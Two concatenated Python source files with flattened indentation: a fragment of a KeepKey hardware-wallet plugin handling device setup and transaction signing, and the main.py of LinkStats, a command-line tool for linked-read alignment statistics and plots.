settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from the user
# because no more than one change address is allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main.py
|
# Copyright (c) 2022 Ed Harry, Wellcome Sanger Institute, Genome Research Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
import sys
import warnings
from concurrent.futures import ThreadPoolExecutor as TPE
from dataclasses import dataclass
from enum import Enum, auto
from functools import partial
from importlib import import_module
from importlib.metadata import version as get_version
from io import StringIO
from itertools import chain, groupby, tee
from pathlib import Path
from threading import Thread
import click as ck
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from tqdm import tqdm as _tqdm
from tqdm.contrib.concurrent import thread_map as _tqdm_map
mpl.use("agg")
mpl.rc("font", **{"family": "sans", "weight": "normal", "size": 14})
mpl.rcParams["agg.path.chunksize"] = 10000
plt.style.use("ggplot")
plt.rcParams["figure.figsize"] = (10.0, 7.0)
import seaborn as sb
sb.set(style="darkgrid", color_codes=True)
NAME = __name__.split(".")[0]
VERSION = get_version(NAME)
DESCRIPTION = "Collect and process statistics from aligned linked-reads."
LICENCE = (
"Copyright (c) 2022 Ed Harry, Wellcome Sanger Institute, Genome Research Limited."
)
sam_parser = getattr(import_module(NAME + "._" + NAME + "_C"), "_" + NAME)
def create_logger_handle(stream, typeid, level):
class LogFilter(logging.Filter):
def __init__(self, level):
super().__init__()
self.__level = level
def filter(self, record):
return record.levelno == self.__level
handle = logging.StreamHandler(stream=stream)
handle.setLevel(level=level)
handle.setFormatter(
logging.Formatter("[%(name)s {id}] :: %(message)s".format(id=typeid))
)
handle.addFilter(LogFilter(level=level))
return handle
LOGGER = logging.getLogger(NAME)
LOGGER.setLevel(logging.INFO)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="status", level=logging.INFO)
)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="error", level=logging.ERROR)
)
LOGGER.addHandler(
create_logger_handle(stream=sys.stderr, typeid="warning", level=logging.WARNING)
)
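# LoggerHandle bridges output from the C extension into the Python logger:
# each add_logger() call creates an os.pipe(), hands the write end (an
# integer file descriptor) to the caller, and starts a reader thread that
# forwards every line written to that descriptor to LOGGER. __exit__ closes
# the write ends so the reader threads see EOF and can be joined.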
class LoggerHandle:
def __init__(self, id):
self.threads_and_handles = []
self.info = self.add_logger(log_func=LOGGER.info, id=id)
self.error = self.add_logger(log_func=LOGGER.error, id=id)
def add_logger(self, log_func, id):
read, write = os.pipe()
def _thread_func():
with os.fdopen(read, encoding="utf-8", errors="replace") as file:
for line in file:
log_func(f"({id}) {line[:-1]}")
thread = Thread(target=_thread_func)
thread.start()
self.threads_and_handles.append((thread, write))
return write
@dataclass
class LogHandles:
info: int
error: int
def __enter__(self):
return self.LogHandles(info=self.info, error=self.error)
def __exit__(self, exc_type, exc_val, exc_tb):
for thread, handle in self.threads_and_handles:
os.close(handle)
thread.join()
def _showwarning(message, category, filename, lineno, file=None, line=None):
LOGGER.warning(
f"[{filename} {lineno}] {message}"
if line is None
else f"[{filename} {lineno}] {message} {line}"
)
warnings.showwarning = _showwarning
warnings.filterwarnings("ignore", message="divide by zero")
warnings.filterwarnings("ignore", message="invalid value encountered in double_scalars")
warnings.filterwarnings("ignore", message="invalid value encountered in true_divide")
class TqdmToLogger(StringIO):
buf = ""
def __init__(self):
super(TqdmToLogger, self).__init__()
def write(self, buf):
self.buf = buf.strip("\r\n")
return len(self.buf)
def flush(self):
LOGGER.info(self.buf)
def close(self):
LOGGER.info("")
super(TqdmToLogger, self).close()
tqdm = partial(_tqdm, file=TqdmToLogger())
tqdm_map = partial(_tqdm_map, file=TqdmToLogger())
MOL_DATA_HEADER = (
"Sample Name",
"Molecule Length",
"No. Reads",
"MI",
"BX",
"Reference",
"Mean Read Depth",
"Mean MapQ",
"No. Gaps",
"Mean Gap Size",
"Max Gap Size",
)
COV_DATA_HEADER = ("Sample Name", "Reference", "Gap Length")
MOL_LEN_HIST_DATA_HEADER = (
"PDF",
"CDF",
"Molecule Length",
"Sample Name",
"Min No. Reads",
)
COV_GAP_HIST_DATA_HEADER = ("PDF", "CDF", "Coverage Gap Length", "Sample Name")
def ReadCSV(path, header):
df = pd.read_csv(path)
if len(df.columns.values) == len(header) and np.all(df.columns.values == header):
return df
else:
LOGGER.error(
f"Error reading '{path}'; expected header:'{header}', got:'{df.columns.values}'"
)
return pd.DataFrame()
class CallBack:
class Types(Enum):
AF = auto()
MD = auto()
CD = auto()
MLHD = auto()
CGHD = auto()
CP = auto()
PP = auto()
def __init__(self, cb_type):
self.cb_type = cb_type
@property
def is_AF(self):
return self.cb_type == self.Types.AF
@property
def is_MD(self):
return self.cb_type == self.Types.MD
@property
def is_MLHD(self):
return self.cb_type == self.Types.MLHD
@property
def is_CGHD(self):
return self.cb_type == self.Types.CGHD
@property
def is_CP(self):
return self.cb_type == self.Types.CP
@property
def is_PP(self):
return self.cb_type == self.Types.PP
@property
def is_CD(self):
return self.cb_type == self.Types.CD
class AlignmentFile(CallBack):
def __init__(self, file, ref, use_mi_tags, cluster_threshold, name=None):
super().__init__(self.Types.AF)
self.file = file
self.ref = ref
self.use_mi_tags = use_mi_tags
self.cluster_threshold = cluster_threshold
self.name = name
@property
def stem_name(self):
return self.file.stem if str(self.file) != "-" else "<stdin>"
class Data(CallBack):
def __init__(self, file, cb_type):
super().__init__(cb_type)
self.file = file
class MoleculeData(Data):
def __init__(self, file):
super().__init__(file, self.Types.MD)
class CoverageData(Data):
def __init__(self, file):
super().__init__(file, self.Types.CD)
class MolLenHistData(Data):
def __init__(self, file):
super().__init__(file, self.Types.MLHD)
class CovGapHistData(Data):
def __init__(self, file):
super().__init__(file, self.Types.CGHD)
class Prefix(CallBack):
def __init__(self, prefix, cb_type):
super().__init__(cb_type)
self.prefix = prefix
class CSVPrefix(Prefix):
def __init__(
self, prefix, save_summ, save_mol, save_cov, save_mol_hist, save_cov_hist
):
super().__init__(prefix, self.Types.CP)
self.save_summ = save_summ
self.save_mol = save_mol
self.save_cov = save_cov
self.save_mol_hist = save_mol_hist
self.save_cov_hist = save_cov_hist
@property
def any_set(self):
return (
self.save_summ
or self.save_mol
or self.save_cov
or self.save_mol_hist
or self.save_cov_hist
)
class PlotPrefix(Prefix):
def __init__(self, prefix):
super().__init__(prefix, self.Types.PP)
def ConcatDF(it):
def iter_then_empty():
yield from it
yield pd.DataFrame()
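# the trailing empty DataFrame guarantees pd.concat always receives at
# least one object (pd.concat of an empty iterable raises ValueError)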
return pd.concat(iter_then_empty(), ignore_index=True)
def GetAllStats(alignment_files, molecular_data, coverage_data, min_reads, threads):
alignment_files = tuple(alignment_files)
def GetAllStatsFromAFs():
@dataclass(frozen=True, eq=True)
class BasicStats:
median_insert_size: int
total_read_length: int
total_alignments: int
total_dup: int
total_qcf: int
total_unm: int
total_nomi: int
total_nobx: int
total_zeromq: int
def ReadSAM(alignment_file, threads):
with LoggerHandle(id=f"Read {alignment_file.stem_name}") as handles:
(
genome_length,
ref_names,
basic_stats,
molecule_data,
coverage_gaps,
) = sam_parser(
log=handles.info,
error=handles.error,
num_threads=threads,
group_cutoff_dis=alignment_file.cluster_threshold,
sam_file_name=str(alignment_file.file),
fasta_file_name=alignment_file.ref,
override_name=alignment_file.name,
fallback_name=alignment_file.stem_name,
use_mi=alignment_file.use_mi_tags,
)
return (
genome_length,
{name: BasicStats(*stats) for name, stats in basic_stats},
tuple(
(name, tuple((ref_names[tid], t2) for tid, t2 in t1))
for name, t1 in molecule_data
),
tuple(
(name, tuple((ref_names[tid], t2) for tid, t2 in t1))
for name, t1 in coverage_gaps
),
)
def GetStats(alignment_file, threads):
genome_length, basic_stats, molecule_data, coverage_gaps = ReadSAM(
alignment_file, threads
)
molecule_data = pd.DataFrame(
(
(
name,
max(0, pos_max - pos_min),
n_reads,
mi,
bx,
reference_name,
total_read_length / max(1, pos_max - pos_min),
total_mapping_quality / n_reads,
len(gaps),
np.mean(gaps) if len(gaps) > 0 else 0,
max(gaps) if len(gaps) > 0 else 0,
)
for name, a in molecule_data
for reference_name, b in a
for (bx, _), c in b
for n_reads, mi, total_mapping_quality, pos_min, pos_max, total_read_length, gaps in c
),
columns=MOL_DATA_HEADER,
)
coverage_data = pd.DataFrame(
(
(name, reference_name, c)
for name, a in coverage_gaps
for reference_name, b in a
for c in b
),
columns=COV_DATA_HEADER,
)
def n_stats(data, ns):
d = np.cumsum((0,) + tuple(np.sort(data)[::-1]))
return tuple(
d[x] - d[x - 1]
for n in ns
for x in (np.where(d >= (d[-1] * n / 100))[0].min(),)
)
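# n_stats computes Nx summary statistics: sort the values in descending
# order, take the running total, and report the value at which the running
# total first reaches x% of the grand total. Worked example: for
# [10, 8, 5, 3, 1] the descending cumulative sums are [10, 18, 23, 26, 27];
# 50% of the total (13.5) is first reached at 18, whose increment is 8,
# so N50 = 8.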
return (
molecule_data,
coverage_data,
pd.DataFrame(
(
(
(
name,
genome_length,
bs.total_alignments,
bs.total_dup / bs.total_alignments,
bs.total_qcf / bs.total_alignments,
bs.total_unm / bs.total_alignments,
(bs.total_alignments - bs.total_unm)
/ bs.total_alignments,
bs.total_nobx / bs.total_alignments,
bs.total_nomi / bs.total_alignments,
bs.total_zeromq / bs.total_alignments,
)
+ n_stats(data["No. Reads"], (50, 90))
+ (
(data["No. Reads"] ** 2).sum()
/ data["No. Reads"].sum(),
)
+ tuple(
chain.from_iterable(
(
(
(
q.shape[0],
q.mean(),
d.mean(),
)
+ n_stats(
d,
(50, 90),
)
+ ((d ** 2).sum() / d.sum(),)
)
for m in min_reads
for s in (data[data["No. Reads"] >= m],)
for d in (s["Molecule Length"],)
for q in (s["Mean MapQ"],)
)
)
)
+ (
bs.median_insert_size,
bs.total_read_length / genome_length,
)
+ tuple(
chain.from_iterable(
(
(
s["Mean Read Depth"].mean(),
s["Molecule Length"].sum() / genome_length,
)
for m in min_reads
for s in (data[data["No. Reads"] >= m],)
)
)
)
)
for name in molecule_data["Sample Name"].unique()
for bs in (basic_stats[name],)
for data in (
molecule_data[molecule_data["Sample Name"] == name],
)
),
columns=(
"Sample Name",
"Genome Length",
"Total Alignments",
"Duplicates",
"QCFail",
"Unmapped",
"Mapped",
"No BX",
"No MI",
"Zero MapQ",
"N50 Reads Per Molecule",
"N90 Reads Per Molecule",
"auN Reads Per Molecule",
)
+ tuple(
chain.from_iterable(
(
(
f"No. Molecules (No. Reads >= {m})",
f"Mean Read MapQ Per Molecule (No. Reads >= {m})",
f"Mean Molecule Length (No. Reads >= {m})",
f"N50 Molecule Length (No. Reads >= {m})",
f"N90 Molecule Length (No. Reads >= {m})",
f"auN Molecule Length (No. Reads >= {m})",
)
for m in min_reads
)
)
)
+ ("Median Insert Size", "Mean Short Read Depth")
+ tuple(
chain.from_iterable(
(
(
f"Mean Short Read Depth Per Molecule (No. Reads >= {m})",
f"Molecule Read Depth (No. Reads >= {m})",
)
for m in min_reads
)
)
),
),
)
max_workers = max(min(threads, len(alignment_files)), 1)
with TPE(max_workers=max_workers) as exe:
return exe.map(
partial(GetStats, threads=max(threads // max_workers, 1)),
alignment_files,
)
def GetAllStatsFromCSVs(data, name, header):
files = tuple(mol.file for mol in data)
return (
iter(
tqdm_map(
partial(ReadCSV, header=header),
files,
max_workers=threads,
desc=f"Read CSVs ({name})",
unit=" CSV files",
unit_scale=True,
)
)
if len(files) > 0
else ()
)
summary_dfs = []
cov_dfs = []
def yield_all():
for df, cov_df, summ_df in GetAllStatsFromAFs():
summary_dfs.append(summ_df)
cov_dfs.append(cov_df)
yield df
yield from GetAllStatsFromCSVs(
molecular_data, "molecular data", MOL_DATA_HEADER
)
return (
ConcatDF(yield_all()),
ConcatDF(
chain(
cov_dfs,
GetAllStatsFromCSVs(coverage_data, "coverage data", COV_DATA_HEADER),
)
),
ConcatDF(summary_dfs),
)
def GetAllMolLenHists(df, hist_data, min_reads, threads):
def GetMolLenHist(args):
MAX_BINS = 1024
sample_name, min_reads = args
data = df[(df["Sample Name"] == sample_name) & (df["No. Reads"] >= min_reads)][
"Molecule Length"
]
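# bin edges are chosen by interpolating over the sorted data, giving
# roughly equal-population (quantile) bins rather than equal-width bins;
# the bin count follows numpy's "auto" heuristic, clamped to MAX_BINS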
prob, length = np.histogram(
data,
bins=np.interp(
np.linspace(
0,
len(data),
np.clip(
len(np.histogram_bin_edges(data, bins="auto")) - 1, 1, MAX_BINS
)
+ 1,
),
np.arange(len(data)),
np.sort(data),
),
density=True,
)
select = ~np.isnan(prob)
return pd.DataFrame(
{
"PDF": prob[select],
"CDF": np.cumsum(prob[select]) / prob[select].sum(),
"Molecule Length": ((length[:-1] + length[1:]) / 2)[select],
"Sample Name": sample_name,
"Min No. Reads": str(min_reads),
}
)
def yield_all():
if df.shape[0] > 0:
yield from iter(
tqdm_map(
GetMolLenHist,
tuple(
(name, n)
for name in df["Sample Name"].unique()
for n in min_reads
),
max_workers=threads,
desc="Generate Molecule Length Histogram Data",
unit=" Data-Sets",
unit_scale=True,
)
)
hist_files = tuple(hist.file for hist in hist_data)
yield from (
iter(
tqdm_map(
partial(ReadCSV, header=MOL_LEN_HIST_DATA_HEADER),
hist_files,
max_workers=threads,
desc="Read CSVs (molecule length histogram data)",
unit=" CSV files",
unit_scale=True,
)
)
if len(hist_files) > 0
else ()
)
return ConcatDF(yield_all())
def GetAllCovGapHists(df, hist_data, threads):
def GetMolLenHist(sample_name):
MAX_BINS = 1024
data = df[(df["Sample Name"] == sample_name)]["Gap Length"]
prob, length = np.histogram(
data,
bins=np.interp(
np.linspace(
0,
len(data),
np.clip(
len(np.histogram_bin_edges(data, bins="auto")) - 1, 1, MAX_BINS
)
+ 1,
),
np.arange(len(data)),
np.sort(data),
),
density=True,
)
select = ~np.isnan(prob)
return pd.DataFrame(
{
"PDF": prob[select],
"CDF": np.cumsum(prob[select]) / prob[select].sum(),
"Coverage Gap Length": ((length[:-1] + length[1:]) / 2)[select],
"Sample Name": sample_name,
}
)
def yield_all():
if df.shape[0] > 0:
yield from iter(
tqdm_map(
GetMolLenHist,
tuple(df["Sample Name"].unique()),
max_workers=threads,
desc="Generate Coverage Gap Histogram Data",
unit=" Data-Sets",
unit_scale=True,
)
)
hist_files = tuple(hist.file for hist in hist_data)
yield from (
iter(
tqdm_map(
partial(ReadCSV, header=COV_GAP_HIST_DATA_HEADER),
hist_files,
max_workers=threads,
desc="Read CSVs (coverage gap histogram data)",
unit=" CSV files",
unit_scale=True,
)
)
if len(hist_files) > 0
else ()
)
return ConcatDF(yield_all())
def documenter(docstring):
def inner_documenter(f):
f.__doc__ = docstring
return f
return inner_documenter
@ck.group(chain=True)
@ck.option(
"-t",
"--threads",
type=ck.IntRange(1, None, clamp=True),
default=4,
help="Number of threads to use. Default=4.",
)
@ck.option(
"-m",
"--min_reads",
type=ck.IntRange(1, None, clamp=True),
multiple=True,
default=(1, 3, 5, 10),
help="Minimum reads per molecule for analysis, multiple values possible. Default=(1, 3, 5, 10).",
)
@ck.version_option()
@documenter(
f"""
{NAME} {VERSION}
\b
{DESCRIPTION}
\b
{LICENCE}
\b
\b
Usage Example, read SAM/BAM/CRAM from <stdin> and save the summary and molecule data in csv format. Analyse molecules grouped by 5 and 10 minimum reads per molecule.
-------------
...<sam/bam/cram> | LinkStats -t 16 -m 5 -m 10 sam-data - save-csvs results/csvs/
\b
Usage Example, combine histogram data from multiple sources into summary plots.
-------------
LinkStats -t 16 hist-data results/dataset_1_molecular_length_histograms.csv.bz2 hist-data results/dataset_2_molecular_length_histograms.csv.bz2 hist-data results/dataset_3_molecular_length_histograms.csv.bz2 save-plots results/plots/
"""
)
def cli(threads, min_reads):
pass
@cli.command()
@ck.argument("path", type=ck.Path(readable=True, path_type=Path))
@ck.option(
"-r",
"--reference",
type=ck.Path(exists=True),
help="FASTA reference for CRAM decoding.",
)
@ck.option(
"-n", "--name", type=str, help="Sample name, overrides name from SM or RG tags."
)
@ck.option(
"--mi/--no-mi",
default=False,
help="Group by MI:I as well as BX:Z SAM tags. Default=False.",
)
@ck.option(
"-t",
"--threshold",
type=int,
default=50000,
help="Maximum allowed separation between alignments grouped to the same molecule.",
)
@documenter(
"""
Read SAM/BAM/CRAM data from PATH.
\b
Creates summary and molecular data-sets for each sample-name (SM:Z tag or RG:Z SAM tag).
\b
Alignments must have BX:Z (barcode) SAM tags.
"""
)
def sam_data(path, mi, threshold, reference=None, name=None):
return AlignmentFile(
file=path, ref=reference, name=name, use_mi_tags=mi, cluster_threshold=threshold
)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in molecular data from a CSV FILE.
\b
Use to re-calculate histogram data.
"""
)
def molecule_data(file):
return MoleculeData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in coverage gap data from a CSV FILE.
\b
Use to re-calculate histogram data.
"""
)
def coverage_data(file):
return CoverageData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in molecule length histogram data from a CSV FILE.
\b
Use to re-generate or create combined plots.
"""
)
def mol_len_hist_data(file):
return MolLenHistData(file=file)
@cli.command()
@ck.argument("file", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Read in coverage gap histogram data from a CSV FILE.
\b
Use to re-generate or create combined plots.
"""
)
def cov_gap_hist_data(file):
return CovGapHistData(file=file)
@cli.command()
@ck.argument("prefix", type=ck.Path(readable=True, path_type=Path))
@ck.option(
"--summ/--no-summ", default=True, help="Save summary data table. Default=True."
)
@ck.option(
"--mol/--no-mol", default=False, help="Save molecule data table. Default=False."
)
@ck.option(
"--cov/--no-cov", default=False, help="Save coverage data table. Default=False."
)
@ck.option(
"--mol-hist/--no-mol-hist",
default=False,
help="Save molecular-length histogram data table. Default=False.",
)
@ck.option(
"--cov-hist/--no-cov-hist",
default=False,
help="Save coverage-gap histogram data table. Default=False.",
)
@documenter(
"""
Saves summary, molecule or histogram data to CSV files at PREFIX_.
\b
By default, only summary data is saved.
"""
)
def save_csvs(prefix, summ, mol, cov, mol_hist, cov_hist):
return CSVPrefix(
prefix,
save_summ=summ,
save_mol=mol,
save_cov=cov,
save_mol_hist=mol_hist,
save_cov_hist=cov_hist,
)
@cli.command()
@ck.argument("prefix", type=ck.Path(readable=True, path_type=Path))
@documenter(
"""
Generates plots from any histogram data and saves them at PREFIX_.
"""
)
def save_plots(prefix):
return PlotPrefix(prefix)
@cli.result_callback()
def run(callbacks, threads, min_reads):
def Error(msg):
LOGGER.error(msg)
sys.exit(1)
LOGGER.info("Starting...")
LOGGER.info("")
csv = tuple(cp for cp in callbacks if cp.is_CP)
if len(csv) == 0:
csv = None
else:
if len(csv) > 1:
warnings.warn(
f"More than one CSV prefix specified, using last one: {csv[-1].prefix}"
)
csv = csv[-1]
if csv and csv.save_summ and len(tuple(af for af in callbacks if af.is_AF)) == 0:
warnings.warn("No SAM data input, cannot output summary data")
csv.save_summ = False
if csv and not csv.any_set:
Error("CSV prefix specified, but no data set to be saved")
plot = tuple(pp.prefix for pp in callbacks if pp.is_PP)
if len(plot) == 0:
plot = None
else:
if len(plot) > 1:
warnings.warn(
f"More than one Plot prefix specified, using last one: {plot[-1]}"
)
plot = plot[-1]
if not (csv or plot):
Error("Neither CSV nor Plot prefix specified, nothing to do")
mol_data, cov_data, summary_data = GetAllStats(
(af for af in callbacks if af.is_AF),
(md for md in callbacks if md.is_MD),
(cd for cd in callbacks if cd.is_CD),
min_reads,
threads,
)
if summary_data.shape[0] > 0:
LOGGER.info("")
for line in str(summary_data).split("\n"):
LOGGER.info(line)
LOGGER.info("")
mol_hist_data = (
GetAllMolLenHists(
mol_data, (hd for hd in callbacks if hd.is_MLHD), min_reads, threads
)
if ((csv and csv.save_mol_hist) or plot)
else None
)
cov_hist_data = (
GetAllCovGapHists(cov_data, (hd for hd in callbacks if hd.is_CGHD), threads)
if ((csv and csv.save_cov_hist) or plot)
else None
)
def base_get_path(f, prefix):
return prefix / f if prefix.is_dir() else Path(str(prefix) + "_" + f)
generated = []
if csv:
csv.prefix.parent.mkdir(parents=True, exist_ok=True)
get_path = partial(base_get_path, prefix=csv.prefix)
def save_csv(args):
df, name = args
name = get_path(name)
df.to_csv(name, index=False)
return name
generated.append(
iter(
tqdm_map(
save_csv,
(
(
((summary_data, "summary_data.csv"),)
if (csv.save_summ and summary_data.shape[0] > 0)
else ()
)
+ (
((mol_data, "molecular_data.csv.bz2"),)
if csv.save_mol
else ()
)
+ (
((cov_data, "coverage_data.csv.bz2"),)
if csv.save_cov
else ()
)
+ (
((mol_hist_data, "molecular_length_histograms.csv.bz2"),)
if csv.save_mol_hist
else ()
)
+ (
((cov_hist_data, "coverage_gap_histograms.csv.bz2"),)
if csv.save_cov_hist
else ()
)
),
max_workers=threads,
desc="Saving CSV data",
